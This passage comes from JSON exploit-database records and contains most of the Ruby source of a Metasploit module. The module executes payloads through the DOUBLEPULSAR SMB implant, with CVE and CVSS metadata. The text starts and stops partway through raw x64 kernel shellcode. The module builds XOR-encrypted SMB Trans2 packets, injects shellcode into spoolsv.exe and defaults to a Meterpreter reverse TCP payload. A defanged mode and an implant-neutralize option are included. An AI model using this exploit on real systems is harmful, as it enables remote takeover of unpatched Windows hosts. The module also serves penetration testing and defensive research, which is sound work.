\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-05] #"}, "lastseen": "2021-10-05T00:15:19", "differentElements": ["sourceData"], "edition": 35}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "6c736d7fc5237a32c9b43e1605b2f89a", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-05T22:17:33", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", 
"1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:42030", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-05T22:17:33", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-05T22:17:33", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires 
Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n 